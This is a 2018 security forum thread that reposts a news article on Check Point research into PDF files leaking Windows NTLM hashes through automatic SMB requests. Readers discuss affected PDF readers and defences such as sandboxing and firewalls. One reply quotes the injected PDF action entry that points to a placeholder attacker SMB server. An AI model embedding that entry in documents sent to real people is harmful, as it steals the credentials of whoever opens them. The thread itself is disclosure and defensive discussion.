PDF Files Can Be Abused to Steal Windows Credentials

guest · Apr 27, 2018

PDF Files Can Be Abused to Steal Windows Credentials
April 27, 2018
https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/

PDF files can be weaponized by malicious actors to steal Windows credentials (NTLM hashes) without any user interaction, and only by opening a file, according to Assaf Baharav, a security researcher with cyber-security Check Point.

Baharav published research this week showing how a malicious actor could take advantage of features natively found in the PDF standard to steal NTLM hashes, the format in which Windows stores user credentials.
Stealing Windows credentials via PDF and SMB
For his research, Baharav created a PDF document that would utilize these two PDF functions. When someone would open this file, the PDF document would automatically make a request to a remote malicious SMB server.
All PDF readers are most likely vulnerable
Now, Baharav has shown that PDF files are just as dangerous. The Check Point researcher told Bleeping Computer that he only field-tested the attack on Adobe Acrobat and FoxIT Reader.
Microsoft released ADV170014 to provide a technical mechanism and instructions on how users could disable NTLM SSO authentication on Windows operating systems, in the hopes of stopping the theft of NTLM hashes via SMB requests made to servers located outside the local network.
Click to expand...

mary7 · Apr 28, 2018

I use Sumatra Pdf it is also vulnerable?

Minimalist · Apr 28, 2018

I would also like know if it works if scripting is disabled in PDF Viewer.
If program doesn't need network connection, blocking it in FW would also help.

guest · Apr 28, 2018

It is not triggered by Javascript.
The pdf file is modified (malicious entry is injected) and by opening of the pdf-file the action is triggered..
Code:
% **** malicious entry ****
/AA <<
  /O <<
     /F (\\\\ <attacker_smb_server> \\ <dummy_file>)
     /D [ 0 /Fit ]
     /S /GotoE
   >>
>>
% *****
https://gbhackers.com/steal-ntlm-credentials-pdf-files/
The PDF files contain primarily of objects together with Document structure, File structure, and content streams. The dictionary contains the objects that are called as entries, the first element is the key and the second element is the value. [...]
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry). The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:
[...]
Click to expand...

By injecting a malicious entry (using the fields described above together with his SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details.
Click to expand...

PrinceYann · Apr 28, 2018

I bet machine name and user name can leak via DNS even if NTLM SSO is disabled.

bo elam · Apr 28, 2018

I think the way I open PDF files is pretty safe. Always sandboxed. When I open a PDF while browsing, the PDF file runs in my Firefox sandbox out of the browser, PDF files don't run within Firefox so cant use Firefox as a vehicle to phone home. Foxit, my PDF reader is not allowed access to the internet. And when I open PDF files from the hard drive, PDF files runs in a dedicated sandbox where only Foxit is allowed to run and all programs are forbidden internet access. Thats secure.

Bo

wolfrun · Apr 29, 2018

Same as you Bo. Only I use SumatraPDF as the only difference.

Log in or Sign up

PDF Files Can Be Abused to Steal Windows Credentials

guest Guest

mary7 Registered Member

Minimalist Registered Member

guest Guest

PrinceYann Registered Member

bo elam Registered Member

wolfrun Registered Member

Log in or Sign up

PDF Files Can Be Abused to Steal Windows Credentials

guest Guest

mary7 Registered Member

Minimalist Registered Member

guest Guest

PrinceYann Registered Member

bo elam Registered Member

wolfrun Registered Member

Useful Searches